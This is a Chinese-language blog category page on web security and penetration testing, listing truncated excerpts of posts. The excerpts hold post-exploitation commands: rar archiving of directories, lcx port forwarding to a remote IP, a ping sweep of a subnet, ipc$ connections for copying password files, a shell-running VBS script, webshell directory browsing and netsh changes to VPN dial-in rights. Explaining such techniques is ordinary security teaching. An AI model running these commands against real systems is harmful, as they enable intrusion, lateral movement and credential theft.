分类 Web安全与渗透下的文章

rar软件渗透用法

命令一：rar.exe a -r -vb d:\test.rar d:\test详解：rar.exe 即电脑安装rar软件的绝对路径中的rar.exe可执行文件。a 表示创建压缩文档的命令。 -r ...

远程：lcx -slave 远程ip 端口本地ip 端口本地：lcx -listen 本地端口本地端口

for /l %i in (1,1,255) do @ping -w 2 -n 1 192.168.200.%i | findstr "TTL="注释：for 一般用于dos命令循环使用，/l参数是列方式展示，%i是个参数在255范围...

net use \\192.168.1.2\ipc$ "password" /user:"administrator"此命令表示，通过ipc$共享管道进行目标主机渗透，双引号中的为密码，user为用户名。主要用来通过管道复制密码文件到...

脚本如下：报错为VBS，通过shell执行，并查看回显结果。On Error Resume NextIf (LCase(Right(WScript.Fullname, 11)) = “wscript.exe”) ThenMsgBox ...

渗透测试过程中，我们会遇到shell或者菜刀无法自动读取目录这个通过手动输入目录路径可以访问（前提得猜路径，常见的program files 这些每个盘符应该都会有）输入后能够访问了，再根据目录安装的应用，想出下一步渗透思路。

如果服务器中存在VPN，通过Dos命令执行操作CMD 下操作 VPN方法：#允许administrator拨入该VPN：netsh ras set user administrator permit#禁止administrator拨入...